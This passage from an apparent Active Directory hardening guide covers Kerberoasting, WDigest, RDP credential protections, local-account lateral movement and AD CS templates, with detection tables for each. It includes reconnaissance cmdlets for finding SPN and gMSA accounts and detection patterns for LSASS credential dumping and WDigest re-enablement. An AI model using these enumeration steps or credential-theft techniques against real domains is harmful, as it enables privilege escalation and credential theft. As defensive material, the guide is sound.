Event ID 4662 with properties matching the replication GUIDs (1131f6aa-*, 1131f6ad-*) from non-domain-controller source addresses is a high-fidelity indicator of DCSync.

Table 20: Detection opportunities for privileged accounts, groups, and GPO modifications

Privileged and Service Account Protections

Identify and Review Noncomputer Accounts Configured with an SPN

Accounts with service principal names (SPNs) are commonly targeted by threat actors for privilege escalation. Using Kerberos, any domain user can request a Kerberos service ticket (TGS) from a domain controller for any account configured with an SPN. Noncomputer accounts likely are configured with guessable (nonrandom) passwords. Regardless of the domain function level or the host's Windows version, SPNs that are registered under a noncomputer account will use the legacy RC4-HMAC encryption suite rather than Advanced Encryption Standard (AES). The key used for encryption and decryption of the RC4-HMAC encryption type represents an unsalted NTLM hash version of the account's password, which could be derived via cracking the ticket.

Organizations should review Active Directory to identify noncomputer accounts configured with an SPN. Noncomputer accounts correlated to registered SPNs are likely service accounts and provide a method for a threat actor (without administrative privileges) to potentially derive (crack) the plain-text password for the account (Kerberoasting). To identify noncomputer accounts configured with an SPN, the PowerShell cmdlet referenced in Figure 31 can be run from a domain controller.

Get-ADUser -Filter {(ServicePrincipalName -like "*")} | Select-Object name,samaccountname,sid,enabled,DistinguishedName

Figure 31: PowerShell cmdlet to identify noncomputer accounts configured with an SPN

Where possible, organizations should deregister noncomputer accounts with SPNs configured. Where SPNs are needed, organizations should mitigate the risk associated with Kerberoasting attacks. Accounts with SPNs should be configured with strong, unique passwords (e.g., minimum 25+ characters) with the passwords rotated on a periodic basis for the accounts. Furthermore, privileges should be reviewed and reduced for these accounts to ensure that each account has the minimum required privileges needed for the intended function.

Accounts with SPNs should be considered in-scope for the proactive hardening measures detailed throughout this blog post.

Note: SPNs should never be associated with regular interactive user accounts.

Detection Opportunities for Noncomputer Accounts Configured with an SPN

Use Case

MITRE ID

Description

Potential Kerberoasting Attempt Using RC4

T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting

Searching for a Kerberos request using downgraded RC4 encryption.

AS-REP Roasting

T1558.004 - Steal or Forge Kerberos Tickets

Monitor Event ID 4768 for Kerberos authentication requests using RC4 encryption (0x17) for accounts with the "Do not require Kerberos preauthentication" flag set. Unlike Kerberoasting (which targets SPNs), AS-REP Roasting targets accounts with disabled preauthentication (which should be reviewed and mitigated).

Table 21: Detection opportunities for noncomputer accounts configured with an SPN

Privileged Account Logon Restrictions

Privileged and service account credentials are commonly used for lateral movement and establishing persistence.

For any accounts that have privileged access throughout an environment, the accounts should not be used on standard workstations and laptops, but rather from designated systems (e.g., privileged access workstations [PAWs]) that reside in restricted and protected VLANs and tiers. Dedicated privileged accounts should be defined for each tier, with controls that enforce that the accounts can only be used within the designated tier. Guardrail enforcement for privileged accounts can be defined within GPOs or by using authentication policy silos (Windows Server 2012 R2 domain-functional level or above).

The recommendations for restricting the scope of access for privileged accounts are based upon Microsoft's guidance for securing privileged access. For additional information, reference:

User Rights Assignments

As a proactive hardening or quick containment measure, consider blocking any accounts with privileged AD access from being able to log in (remotely or locally) to standard workstations, laptops, and common access servers (e.g., virtualized desktop infrastructure).

The settings referenced as follows are configurable using user rights assignments defined within GPOs via the path of: 

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment

Accounts delegated with domain-based privileged access should be explicitly denied access to standard workstations and laptop systems within the context of the following settings (which can be configured using GPO settings similar to what are depicted in Figure 32):

  • Deny access to this computer from the network (also include S-1-5-114: NT AUTHORITY\Local account and member of Administrators group) (SeDenyNetworkLogonRight)

  • Deny logon as a batch job (SeDenyBatchLogonRight)

  • Deny logon as a service (SeDenyServiceLogonRight)

  • Deny logon locally (SeDenyInteractiveLogonRight)

  • Deny logon through Terminal Services (SeDenyRemoteInteractiveLogonRight)

Example of Privileged Account Access Restrictions for a Standard Workstation Using GPO Settings

Figure 32: Example of privileged account access restrictions for a standard workstation using GPO settings

Additionally, using GPOs, permissions can be restricted on endpoints to protect against privilege escalation and potential data theft by reducing the scope of accounts that have the following user rights assignments:

  • Debug programs (SeDebugPrivilege

  • Back up files and directories (SeBackupPrivilege

  • Restore files and directories (SeRestorePrivilege

  • Take ownership of files or other objects (SeTakeOwnershipPrivilege)

Detection Opportunities for Privileged Account Logons

Use Case

MITRE ID

Description

Attempted Logon of a Privileged Account from a Nonprivileged Access Workstation

T1078 – Valid Accounts

Search for logon attempts correlating to highly privileged accounts authenticating to systems that reside outside of the Tier 0 layer.

Table 22: Detection opportunities for privileged account logons

Service Account Logon Restrictions

Organizations should also consider enhancing the security of domain-based service accounts to restrict the capability for the accounts to be used for interactive, remote desktop, and, where possible, network-based logons. 

Minimum recommended logon hardening for service accounts (on endpoints where the service account is not required for interactive or remote logon purposes):

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment
    • Deny logon locally (SeDenyInteractiveLogonRight)
    • Deny logon through Terminal Services (SeDenyRemoteInteractiveLogonRight)

Additional recommended logon hardening for service accounts (on endpoints where the service accounts is not required for network-based logon purposes):

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment
    • Deny access to this computer from the network (SeDenyNetworkLogonRight)

If a service account is only required to be leveraged on a single endpoint to run a specific service, the service account can be further restricted to only permit the account's usage on a predefined listing of endpoints (Figure 33).

  • Active Directory Users and Computers > Select the account
    • Account tab
      • Log On To button > Select the proper scope of computers for access
Option to Restrict an Account to Log onto Specific Endpoints

Figure 33: Option to restrict an account to log onto specific endpoints

Detection Opportunities for Service Account Logons

Use Case

MITRE ID

Description

Anomalous Logon from a Service Account

T1078 – Valid Accounts

Search for login attempts for a service account on a new (unexpected) endpoint. This will require baselining service accounts to expected (approved) systems.

Table 23: Detection opportunities for service account logons

Managed/Group Managed Service Accounts

Organizations with static service accounts should review the feasibility of migrating the service accounts to be managed service accounts (MSAs) or group managed service accounts (gMSAs).

MSAs were first introduced with the Windows Server 2008 R2 Active Directory schema (domain-functional level) and provide automatic password management (30-day rotation) for dedicated service accounts that are associated with running services on specific endpoints.

  • Standard MSA: The account is associated with a single endpoint, and the complex password for the account is automatically managed and changed on a predefined frequency (30 days by default). While an MSA can only be associated with a single computer account, multiple services on the same endpoint can leverage the MSA.

  • Group managed service account (gMSA): First introduced with Windows Server 2012 and are very similar to MSAs, but allow for a single gMSA to be leveraged across multiple endpoints.

Common uses for MSAs and gMSAs:

  • Scheduled Tasks

  • Internet Information Services (IIS) application pools

  • Structured Query Language (SQL) services (SQL 2012 and later) – Express editions are not supported by MSAs.

  • Microsoft Exchange services

  • Network Load Balancing (clustering) – gMSAs only

  • Third-party applications that support MSAs

Note: Threat actors can potentially discover accounts and groups that have permissions to read/leverage the password for a gMSA for privilege escalation and lateral movement. This can be accomplished by leveraging the get-adserviceaccount PowerShell cmdlet and enumerating the msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) configuration for a gMSA, which stores the security principals that can access the gMSA password. It is important that when configuring managed service accounts, organizations focus on restricting the scope of accounts and groups that have the ability to obtain and leverage the password for the managed service accounts and enforce structured monitoring of these accounts and groups.

For additional information related to MSAs and gMSAs, reference:

Detection Opportunities for Managed/Group Managed Service Accounts

Use Case

MITRE ID

Description

Group Membership Addition

T1069 – Permission Groups Discovery

T1098 – Account Manipulation

Search for MSAs/gMSAs and the associated PrincipalsAllowedToRetrieveManagedPassword or PrincipalsAllowedToDelegateToAccount permissions, which could provide the ability to leverage the MSA/gMSA for malicious purposes.

Example reconnaissance commands for querying for MSAs/gMSAs and associated attributes:

get-adserviceaccount

get-adserviceaccount -filter {name -eq 'account-name'} -prop * | select Name, MemberOf, PrincipalsAllowedToDelegateToAccount, PrincipalsAllowedToRetrieveManagedPassword

Figure 34: Example reconnaissance commands for querying for MSAs/gMSAs

Table 24: Detection opportunities for managed/group managed service accounts

Protected Users Security Group

By leveraging the Protected Users security group for privileged accounts, an organization can minimize various exposure factors and common exploitation methods by a threat actor or malware variant obtaining credentials for privileged accounts on disk or in memory from endpoints.

Beginning with Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2 (and above), the Protected Users security group was introduced to manage credential exposure within an environment. Members of this group automatically have specific protections applied to accounts, including:

  • The Kerberos ticket granting ticket (TGT) expires after four hours, rather than the normal 10-hour default setting.

  • No NTLM hash for an account is stored in LSASS, since only Kerberos authentication is used (NTLM authentication is disabled for an account).

  • Cached credentials are blocked. A domain controller must be available to authenticate the account.

  • WDigest authentication is disabled for an account, regardless of an endpoint's applied policy settings.

  • DES and RC4 cannot be used for Kerberos preauthentication (Server 2012 R2 or higher); rather, Kerberos with AES encryption will be enforced.

  • Accounts cannot be used for either constrained or unconstrained delegation (equivalent to enforcing the Account is sensitive and cannot be delegated setting in Active Directory Users and Computers).

To provide domain controller-side restrictions for members of the Protected Users security group, the domain functional level must be Windows Server 2012 R2 (or higher). Microsoft Security Advisory KB2871997 adds compatibility support for the protections enforced for members of the Protected Users security group for Windows 7, Windows Server 2008 R2, and Windows Server 2012 systems.

Successful (Event IDs 303, 304) or failed (Event IDs 100, 104) logon events for members of the Protected Users security group can be recorded on domain controllers within the following event logs:

  • %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Authentication%4ProtectedUserSuccesses-DomainController.evtx
  • %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-Authentication%4ProtectedUserFailures-DomainController.evtx

The event logs are disabled by default and must be enabled on each domain controller. The PowerShell cmdlets referenced in Figure 35 can be leveraged to enable the event logs for the Protected Users security group on a domain controller.

$log1 = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController
$log1.IsEnabled=$true
$log1.SaveChanges()

$log2 = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController
$log2.IsEnabled=$true
$log2.SaveChanges()

Figure 35: PowerShell cmdlets for enabling event logging for the Protected Users security group on domain controllers

Note: Service accounts (including MSAs) should not be added to the Protected Users security group, as authentication will fail.

If the Protected Users security group cannot be used, at a minimum, privileged accounts should be protected against delegation by configuring the account with the Account is Sensitive and Cannot Be Delegated flag in Active Directory.

Detection Opportunities for the Protected Users Security Group

Use Case

MITRE ID

Description

Removal of Account from Protected User Group

T1098 – Account Manipulation

Search for an account that has been removed from the Protected Users group. 

Attempted Logon of an Account in the Protected User Group from a Nonprivileged Access Workstation

T1078 – Valid Accounts

Search for logon attempts from accounts in the Protected Users group authenticating from workstations of nonprivileged users.

Table 25: Detection opportunities for the Protected Users security group

Clear-Text Password Protections

In addition to restricting access for privileged accounts, controls should be enforced that minimize the exposure of credentials and tokens in memory on endpoints.

On older Windows versions, clear-text passwords are stored in memory (LSASS) to primarily support WDigest authentication. WDigest should be explicitly disabled on all Windows endpoints where it is not disabled by default.

By default, WDigest authentication is disabled in Windows 8.1+ and in Windows Server 2012 R2+.

Beginning with Windows 7 and Windows Server 2008 R2, after installing KB2871997, WDigest authentication can be configured either by modifying the registry or by using the Microsoft Security Guide GPO template from the Microsoft Security Compliance Toolkit.

Registry Method
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
REG_DWORD = "0"

Figure 36: Registry key and value for disabling WDigest authentication

Another registry setting that should be explicitly configured is the TokenLeakDetectDelaySecs setting (Figure 37), which will clear credentials in memory of logged-off users after 30 seconds, mimicking the behavior of Windows 8.1 and above.

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\TokenLeakDetectDelaySecs
REG_DWORD = "30"

Figure 37: Registry key and value for enforcing the TokenLeakDetectDelaySecs setting

Group Policy Method

Using the Microsoft Security Guide Group Policy template, WDigest authentication can be disabled via a GPO setting (Figure 38).

  • Computer Configuration > Policies > Administrative Templates > MS Security Guide > WDigest Authentication

    • Disabled
Disabling WDigest Authentication via the MS Security Guide Group Policy Template

Figure 38: Disabling WDigest authentication via the MS Security Guide Group Policy Template

Additionally, an organization should verify that Allow* settings are not specified within the registry keys referenced in Figure 39, as this configuration would permit the tspkgs/CredSSP providers to store clear-text passwords in memory.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation

Figure 39: Additional registry keys for hardening against clear-text password storage

Group Policy Reprocessing

Threat actors can manually enable WDigest authentication on endpoints by directly modifying the registry (UseLogonCredential configured to a value of 1). Even on endpoints where WDigest authentication is automatically disabled by default, it is recommended to enforce the GPO settings noted as follows, which will enforce automatic group policy reprocessing for the configured (expected) settings on an automated basis.

  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing

    • Enabled - Process even if the Group Policy objects have not changed

  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing

    • Enabled - Process even if the Group Policy objects have not changed

Note: By default, Group Policy settings are only reprocessed and reapplied if the actual Group Policy was modified prior to the default refresh interval.

As KB2871997 is not applicable for Windows XP, Windows Server 2003, and Windows Server 2008, to disable WDigest authentication on these platforms, prior to a system reboot, WDigest needs to be removed from the listing of LSA security packages within the registry (Figure 40 and Figure 41).

HKLM\System\CurrentControlSet\Control\Lsa\Security Packages

Figure 40: Registry key to modify LSA security packages

LSA security Package Registry Key Before and After Removal of WDigest Authentication from Listing of Providers

Figure 41: LSA security package registry key before and after removal of WDigest authentication from listing of providers

Detection Opportunities for WDigest Authentication Conditions

Use Case

MITRE ID

Description

Enable WDigest Authentication

T1112 – Modify Registry

Search for evidence of WDigest being enabled in the Windows Registry.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential

REG_DWORD = "1"

Figure 42: WDigest Windows Registry modification

LSASS Memory Access

T1003.002 - OS Credential Dumping - LSASS Memory

Monitor for processes accessing lsass.exe memory (Sysmon Event ID 10 with GrantedAccess 0x1010 or 0x1FFFFF). Alert on any non-system process opening a handle to LSASS. Deploy LSA Protection (RunAsPPL) and Credential Guard on all supported endpoints.

Table 26: Detection opportunities for WDigest authentication conditions

Credential Protections When Using RDP

Restricted Admin Mode for RDP

Restricted Admin mode for RDP can be enabled for all end-user systems assigned to personnel that perform Remote Desktop connections to servers or workstations with administrative credentials. This feature can limit the in-memory exposure of administrative credentials on a destination endpoint when accessed using RDP.

To leverage Restricted Admin RDP, the command referenced in Figure 43 can be invoked.

mstsc.exe /RestrictedAdmin

Figure 43: Command to invoke restricted admin RDP

When an RDP connection uses the Restricted Admin mode, if the authenticating account is an administrator on the destination endpoint, the credentials for the user account are not stored in memory; rather, the context of the user account appears as the destination machine account (domain\destination-computer$).

To leverage Restricted Admin mode for RDP, settings must be enforced on the originating endpoint in addition to the destination endpoint.

Originating Endpoint (Client Mode - Windows 7 and Windows Server 2008 R2 and above)

A GPO setting must be applied to the originating endpoint initiating the remote desktop session using the Restricted Admin feature.

  • Computer Configuration > Policies > Administrative Templates > System > Credential Delegation > Restrict delegation of credentials to remote servers

    • Require Restricted Admin > set to Enabled

      • Use the Following Restricted Mode > Required Restricted Admin

Configuring this GPO setting will result in the registry keys noted in Figure 44 being configured on an endpoint.

HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministration
0 = Disabled
1 = Enabled

HKLM\Software\Policies\Microsoft\Windows\CredentialsDelegation\RestrictedRemoteAdministrationType
1 = Require Restricted Admin
2 = Require Remote Credential Guard
3 = Restrict Credential Delegation

Figure 44: Registry settings for requiring Restricted Admin mode

Destination Endpoint (Server Mode - Windows 8.1 and Windows Server 2012 R2 and above)

A registry setting will need to be configured (Figure 45).

HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin
0 = Enabled
1 = Disabled

Figure 45: Registry setting for enabling or disabling Restricted Admin RDP

Recommended: Set the registry value to 0 to enable Restricted Admin mode.

With Restricted Admin RDP, another setting that should be configured is the DisableRestrictedAdminOutboundCreds registry key (Figure 46).

HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdminOutboundCreds
0 = default value (doesn't exist) - Admin Outbound Creds are Enabled
1 = Admin Outbound Creds are Disabled

Figure 46: Registry setting for disabling admin outbound credentials

Recommended: Set the registry value to 1 to disable admin outbound credentials.

Note: With this setting set to 0, any outbound authentication requests will appear as the system (domain\destination-computer$) that a user connected to using Restricted Admin mode. Setting this to 1 disables the ability to authenticate to any downstream network resources when attempting to authenticate outbound from a system that a user connected to using Restricted Admin mode for RDP.

For additional information regarding Restricted Admin mode for RDP, reference:

Detection Opportunities for Restricted Admin Mode for RDP

Use Case

MITRE ID

Description

Disable Restricted Admin Mode for RDP

T1112 – Modify Registry

Search for an account disabling Restricted Admin mode for RDP in the Windows Registry.

HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin 

REG_DWORD = "1"

Figure 47: Restricted Admin mode for RDP being disabled in the Windows Registry on a destination endpoint

Disable Require Restricted Admin

T1484.001 – Domain Policy Modification: Group Policy Modification

Search for the Require Restricted Admin option being disabled within a GPO configuration. 

Computer Configuration > Policies > Administrative Templates > System > Credential Delegation > Restrict delegation of credentials to remote servers

"Require Restricted Admin" > set to Disabled

Figure 48: Require Restricted Admin being disabled in a GPO

Table 27: Detection opportunities for Restricted Admin Mode for RDP

Windows Defender Remote Credential Guard

For Windows 10 and Windows Server 2016 endpoints, Windows Defender Remote Credential Guard can be leveraged to reduce the exposure of privileged accounts in memory on destination endpoints when Remote Desktop is used for connectivity. With Remote Credential Guard, all credentials remain on the client (origination system) and are not directly exposed to the destination endpoint. Instead, the destination endpoint requests service tickets from the source as needed.

When a user logs in via RDP to an endpoint that has Remote Credential Guard enabled, none of the SSPs in memory store the account's clear-text password or password hash. Note that Kerberos tickets remain in memory to allow interactive (and single sign-on [SSO]) experiences from the destination server.

The Remote Desktop client (origination) host:

  • Must be running at least Windows 10 (v1703) to be able to supply credentials

  • Must be running at least Windows 10 (v1607) or Windows Server 2016 to use the user's signed-in credentials (no prompt for credentials)

  • User's account must be able to sign into both the client (origination) and the remote (destination) endpoint

  • Must be running the Remote Desktop Classic Windows application

  • Must use Kerberos authentication to connect to the remote host

  • The Remote Desktop Universal Windows Platform application does not support Windows Defender Remote Credential Guard.

Note: If the client cannot connect to a domain controller, then RDP attempts to fall back to NTLM. Windows Defender Remote Credential Guard does not allow NTLM fallback because this would expose credentials to risk.

The Remote Desktop remote (destination) host:

  • Must be running at least Windows 10 (v1607) or Windows Server 2016

  • Must allow Restricted Admin connections

  • Must allow the client's domain user to access Remote Desktop connections

  • Must allow delegation of nonexportable credentials

To enable Remote Credential Guard on the client (origination) host using a GPO configuration:

  • Computer Configuration > Administrative Templates > System > Credentials Delegation > Restrict delegation of credentials to remote servers
    • To require either Restricted Admin mode or Windows Defender Remote Credential Guard, choose Prefer Windows Defender Remote Credential Guard.
      • In this configuration, Remote Credential Guard is preferred, but it will use Restricted Admin mode (if supported) when Remote Credential Guard cannot be used.
      • Neither Remote Credential Guard nor Restricted Admin mode for RDP will send credentials in clear text to the Remote Desktop server.
    • To require Remote Credential Guard, choose Require Windows Defender Remote Credential Guard.
      • In this configuration, a Remote Desktop connection will succeed only if the remote computer meets the requirements for Remote Credential Guard.

To enable Remote Credential Guard on the remote (destination) host, see Figure 49.

HKLM\System\CurrentControlSet\Control\Lsa
Registry Entry: DisableRestrictedAdmin
Value: 0
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD

Figure 49: Registry key and command options to enable Remote Credential Guard on a remote (destination) host

To leverage Remote Credential Guard, use the command referenced in Figure 50.

mstsc.exe /remoteguard

Figure 50: Command to leverage Remote Credential Guard

Detection Opportunities for Windows Defender Remote Credential Guard

Use Case

MITRE ID

Description

Disable Remote Credential Guard

T1112 – Modify Registry

Search for an account disabling Remote Credential Guard in the Windows Registry.

HKLM\System\CurrentControlSet\Control\Lsa

Registry Entry: DisableRestrictedAdmin

Value: 1

Figure 51: Remote Credential Guard being disabled in the Windows Registry on a destination endpoint

Disable Require Remote Credential Guard

T1484.001 – Domain Policy Modification: Group Policy Modification

Search for the Require Remote Credential Guard option being disabled within a GPO configuration.
 

Computer Configuration > Administrative Templates > System > Credentials Delegation > Restrict delegation of credentials to remote servers

Figure 52: Remote Credential Guard being disabled in a GPO

Table 28: Detection opportunities for Windows Defender Remote Credential Guard

Restrict Remote Usage of Local Accounts

Local accounts that exist on endpoints are often a common avenue leveraged by threat actors to laterally move throughout an environment. This tactic is especially impactful when the password for the built-in local administrator account is configured to the same value across multiple endpoints.

To mitigate the impact of local accounts being leveraged for lateral movement, organizations should consider both limiting the ability of local administrator accounts to establish remote connections and creating unique and randomized passwords for local administrator accounts across the environment.

KB2871997 introduced two well-known SIDs that can be leveraged within GPO settings to restrict the use of local accounts for lateral movement.

  • S-1-5-113: NT AUTHORITY\Local account
  • S-1-5-114: NT AUTHORITY\Local account and member of Administrators group

Specifically, the SID S-1-5-114: NT AUTHORITY\Local account and member of Administrators group is added to an account's access token if the local account is a member of the BUILTIN\Administrators group. This is the most beneficial SID to leverage to help stop a threat actor (or ransomware variant) that propagates using credentials for any local administrative accounts.

Note: For SID S-1-5-114: NT AUTHORITY\Local account and member of Administrators group, if Failover Clustering is used, this feature should leverage a nonadministrative local account (CLIUSR) for cluster node management. If this account is a member of the local Administrators group on an endpoint that is part of a cluster, blocking the network logon permissions can cause cluster services to fail. Be cautious and thoroughly test this configuration on servers where Failover Clustering is used.

Step 1 – Option 1: S-1-5-114 SID

To mitigate the use of local administrative accounts from being used for lateral movement, use the SID S-1-5-114: NT AUTHORITY\Local account and member of Administrators group within the following settings:

  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment
    • Deny access to this computer from the network (SeDenyNetworkLogonRight)
    • Deny logon as a batch job (SeDenyBatchLogonRight)
    • Deny logon as a service (SeDenyServiceLogonRight)
    • Deny logon through Terminal Services (SeDenyRemoteInteractiveLogonRight)
    • Debug programs (SeDebugPrivilege: Permission used for attempted privilege escalation and process injection)

Step 1 – Option 2: UAC Token-Filtering

An additional control that can be enforced via GPO settings pertains to the usage of local accounts for remote administration and connectivity during a network logon. If the full scope of permissions (referenced previously) cannot be implemented in a short timeframe, consider applying the User Account Control (UAC) token-filtering method to local accounts for network-based logons. 

To leverage this configuration via a GPO setting:

  1. Download the Security Compliance Toolkit (https://www.microsoft.com/en-us/download/details.aspx?id=55319) to use the MS Security Guide ADMX file. 

  2. Once downloaded, the SecGuide.admx and SecGuide.adml files must be copied to the \Windows\PolicyDefinitions and \Windows\PolicyDefinitions\en-US directories respectively.

  3. If a centralized GPO store is configured for the domain, copy the PolicyDefinitions folder to the C:\Windows\SYSVOL\sysvol\<domain>\Policies folder.

GPO Setting
  • Computer Configuration > Policies > Administrative Templates > MS Security Guide > Apply UAC restrictions to local accounts on network logons

    • Enabled

Once enabled, the registry value (Figure 53) will be configured on each endpoint.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy

REG_DWORD = "0" (Enabled)

Figure 53: Registry key and value for enabling UAC restrictions for local accounts

When set to 0, remote connections with high-integrity access tokens are only possible using either the plain-text credential or password hash of the RID 500 local administrator (and only then depending on the setting of FilterAdministratorToken, which is configurable via the GPO setting of User Account Control: Admin Approval Mode for the built-in Administrator account).

The FilterAdministratorToken option can either enable (1) or disable (0) (default) Admin Approval mode for the RID 500 local administrator. When enabled, the access token for the RID 500 local administrator account is filtered and therefore UAC is enforced for this account (which can ultimately stop attempts to leverage this account for lateral movement across endpoints).

GPO Setting
  • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options > User Account Control: Admin Approval Mode for the built-in Administrator account

Once enabled, the registry value (Figure 54) will be configured on each endpoint.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken

REG_DWORD = "1" (Enabled)

Figure 54: Registry key and value for requiring Admin Approval Mode for local administrative accounts

Note: It is also prudent to ensure that the default setting for User Account Control: Run all administrators in Admin Approval Mode (EnableLUA option) is not changed from Enabled (default, as shown in Figure 55) to Disabled. If this setting is disabled, all UAC policies are also disabled. With this setting disabled, it is possible to perform privileged remote authentication using plain-text credentials or password hashes with any local account that is a member of the local Administrators group.

GPO Setting
  • Computer Configuration > Policies > Administrative Templates > MS Security Guide > User Account Control: Run all administrators in Admin Approval Mode

    • Enabled

Once enabled, the registry value (Figure 55) will be configured on each endpoint. This is the default setting.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

REG_DWORD = "1" (Enabled)

Figure 55: Registry key and value for requiring Admin Approval Mode for all local administrative accounts

UAC access token filtering will not affect any domain accounts in the local Administrators group on an endpoint.

Step 2: LAPS

In addition to blocking the use of local administrator accounts from remote authentication to access endpoints, an organization should align a strategy to enforce password randomization for the built-in local administrator account. For many organizations, the easiest way to accomplish this task is by deploying and leveraging Microsoft's Local Administrator Password Solutions (LAPS).

Additional information regarding LAPS, and here too.

Detection Opportunities for Local Accounts

Use Case

MITRE ID

Description

Attempted Remote Logon of Local Account

T1078.003 - Valid Accounts: Local Accounts

Search for remote logon attempts for local accounts on an endpoint.

Table 29: Detection opportunities for local accounts

Active Directory Certificate Services (AD CS) Protections

Active Directory Certificate Services (AD CS) is Microsoft's implementation of Public Key Infrastructure (PKI) and integrates directly with Active Directory forests and domains. It can be utilized for a variety of purposes, including digital signatures and user authentication. Certificate Templates are used in AD CS to issue certificates that have been preconfigured for particular tasks. They contain settings and rules that are applied to incoming certificate requests and provide instructions on how a valid certificate request is provided.

In June of 2021, SpecterOps published a blog post named Certified Pre-Owned, which details their research into possible attacks against AD CS. Since that publication, Mandiant has continued to observe both threat actors and red teamers enhance targeting of AD CS in support of post-compromise objectives. Mandiant's blog post and hardening guide address the continued abuse scenarios and AD CS attack vectors identified through our frontline observations of recent security breaches.

Discover Vulnerable Certificate Templates

Certificate templates that have been configured and published by AD CS are stored in Active Directory as objects with an object class of pKICertificateTemplate and can be discovered by blue teams as well as threat actors. Any account that is authenticated to Active Directory can query LDAP directly, with the built-in Windows command certutil.exe, or with specialized tools such as PSPKIAudit, Certipy, and Certify. Mandiant recommends using one of these methods to discover vulnerable certificate templates.

Harden Vulnerable Certificate Templates

Once discovered, vulnerable certificate templates should be hardened to prevent abuse.

  1. Ensure that all domain controllers and Certificate Authority servers are patched with the latest updates and hotfixes.

  2. After installing Windows update (KB5014754) and monitoring/remediating for Event IDs 39 and 41, configure Active Directory to support full enforcement mode to reject authentications based on weaker mappings in certificates.

  3. Using one of the aforementioned methods, regularly review published certificate templates, specifically for any settings related to SAN specifications configured in existing templates.

  4. Review the security permissions assigned to all published certificate templates and validate the scope of enrollment and write permissions are delegated to the correct security principals.

  5. Review published templates configured with the following Enhanced Key Usages (EKUs) that support domain authentication and verify the operational requirement for these configurations.

  • Any Purpose (2.5.29.37.0)

  • Subordinate CA (None)

  • Client Authentication (1.3.6.1.5.5.7.3.2)

  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)

  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)

  • For templates with sensitive Enhanced Key Usage (EKU), limit enrollment permissions to predefined users or groups, as certificates with EKUs can be used for multiple purposes. Access control lists for templates should be audited to ensure that they align with the principle of least privilege.Templates that allow for domain authentication should be carefully reviewed to verify that built-in groups that contain a large scope of accounts are not assigned enrollment permissions. Example: built-in groups that could increase the risk for abuse include:

    • Everyone

    • NT AUTHORITY\Authenticated Users

    • Domain Users

    • Domain Computers

  • Where possible, enforce "CA Certificate Manager approval" for any templates that include a SAN as an issuance requirement. This will require that any certificate issuance requests be manually reviewed and approved by an identity assigned the "Issue and Manage Certificates" permission on a certificate authority server.

  • Ensure that Certificate Authorities have not been configured to accept any SAN (irrelevant of the template configuration). This is a non-default configuration and should be avoided wherever possible. This abuse vector is mitigated by KB5014754, but until enforcement of strong mappings is enforced, abuse could still occur based upon historical certificates missing the new OID containing the requester's SID. For additional information, reference the following Microsoft article.

  • Treat both root and subordinate certificate authorities as Tier 0 assets and enforce logon restrictions or authentication policy silos to limit the scope of accounts that have elevated access to the servers where certificate services are installed and configured.

  • Audit and review the NTAuthCertificates container in AD to validate the referenced CA certificates, as this container references CA certificates that enable authentication within AD. Before authenticating a principal, AD checks the NTAuthCertificates container for the CA specified in the authenticating certificate's Issuer field to validate the authenticity of the CA. If rogue or unauthorized CA certificates are present, this could be indicative of a security event that requires further triage and investigation.

  • To avoid the theft of a CA's private keys (e.g., via the DPAPI backup protocol), protect the private keys by leveraging a Hardware Security Module (HSM) on servers where certificate authority services are installed and configured.

  • Enforce multifactor authentication (MFA) for CA and AD management and operations.

  • Keep the root CA offline and use subordinate CAs to issue certificates.

  • Regularly validate and identify potential misconfigurations within existing certificate templates using the built-in Windows command certutil.exe, or with specialized tools such as PSPKIAudit, Certipy, and Certify. Public tools (e.g., PSPKIAudit, Certipy, or Certify) may be flagged by EDR products as they are frequently used by red teams and threat actors.

  • To mitigate NTLM Relay attacks in AD CS, enable Extended Protection For Authentication for Certificate Authority Web Enrollment and Certificate Enrollment Web Service. Additionally, require that AD CS accept only HTTPS connections. For additional details, reference the following Microsoft Article.

  • Enable audit logging for Certificate Services on CA servers and Kerberos Authentication Service on Domain Controllers by using group policy. Ensure that event IDs 4886 and 4887 from CA servers and 4768 from domain controllers are aggregated in the organization's SIEM solution.

  • Enable the audit filter on each CA server. This is a bitmask value that represents the seven different audit categories that can be enabled; if all values are enabled, the audit filter will have a value of 127.

  • Log and monitor events from the CA servers and domain controllers to enhance detections related to AD CS activities (steps 16 and 17 are needed to ensure the appropriate logs are generated).

  • Detection Opportunities for AD CS Abuse

    Certificate Request with Mismatched SAN (ESC1)

    T1649 - Steal or Forge Authentication Certificates

